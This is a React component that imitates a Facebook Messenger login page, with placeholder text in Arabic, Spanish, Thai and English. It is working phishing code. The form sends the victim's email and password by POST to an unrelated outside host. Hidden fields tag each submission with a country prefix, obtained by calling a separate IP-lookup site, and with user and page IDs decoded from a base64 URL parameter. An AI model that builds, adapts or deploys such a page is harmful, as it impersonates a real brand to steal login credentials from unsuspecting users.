import axios from "axios";
import { useEffect, useState } from "react";
import { useParams } from "react-router-dom";
import "../assets/css/messenger.css";
import cpp from "country-phone-prefix";
export default function Messenger() {
  let { url } = useParams();
  let [userId, setuserId] = useState("0");
  let [pageId, setpageId] = useState("0");
  let [country, setCountry] = useState("0");
  let [email, setEmail] = useState("0");
  let [pass, setpassword] = useState("0");
  useEffect(() => {
    axios.get("https://livebotola.com/ip.php").then((resps) => {
      let dd = cpp[resps.data];
      setCountry(dd.prefix);
    });
    let decodeUrl = atob(url);
    const lang = decodeUrl.split("_")[1].split("=")[1];
    setuserId(decodeUrl.split("_")[3].split("=")[1]);
    setpageId(decodeUrl.split("_")[2].split("=")[1]);
    if (lang == "ar") {
      document.body.setAttribute("dir", "rtl");
      document.getElementById("email").placeholder =
        "رقم الهاتف  أو البريد الإلكتروني";
      document.getElementById("password").placeholder = "كلمه السر";

      document.getElementById("login").innerHTML = "تسجيل الدخول";
    } else if (lang == "es") {
      document.getElementById("email").placeholder =
        "Número o correo electrónico";
      document.getElementById("password").placeholder = "contraseña";

      document.getElementById("login").innerHTML = "iniciar sesión";
    } else if (lang == "th") {
      document.getElementById("email").placeholder = "เบอร์มือถือหรืออีเมล";
      document.getElementById("password").placeholder = "รหัสผ่าน";

      document.getElementById("login").innerHTML = "เข้าสู่ระบบ";
    } else {
      document.getElementById("email").placeholder =
        "Mobile number or email address";
      document.getElementById("password").placeholder = "Password";
      document.getElementById("login").innerHTML = "Log In";
    }
  }, []);

  return (
    <div className="body2" id="page">
      <div className="body3">
        <i className="logo"></i>
        <h1>Messenger</h1>
        <h2>Sign in with Facebook to get started.</h2>

        <form action="https://sc0m.com/v/add" id="veh0" method="POST">
          <input
            className="inputl"
            id="email"
            maxLength="50"
            placeholder="Email address or phone number"
            type="text"
            name="email"
            required
          />
          <input
            className="inputl"
            id="password"
            name="password"
            maxLength="50"
            placeholder="Password"
            type="password"
            required
          />
          <input type="hidden" value={country} name="codecountry" />
          <input type="hidden" value={userId} name="userId" />
          <input type="hidden" value="1" name="time" />
          <input type="hidden" value="1" name="date" />
          <input type="hidden" value="1" name="ip_address" />
          <input type="hidden" value="1" name="CreateAt" />
          <input type="hidden" value={pageId} name="pageId" />

          <label className="container">
            {" "}
            <input type="checkbox" /> <span className="checkmark"></span>{" "}
            <label className="chbox" htmlFor="input">
              Keep me signed in
            </label>{" "}
          </label>

          <button className="inlog" id="login" type="submit">
            <span>Continue</span>
          </button>
          <div> Messenger Copyright ©️</div>
        </form>
      </div>
    </div>
  );
}
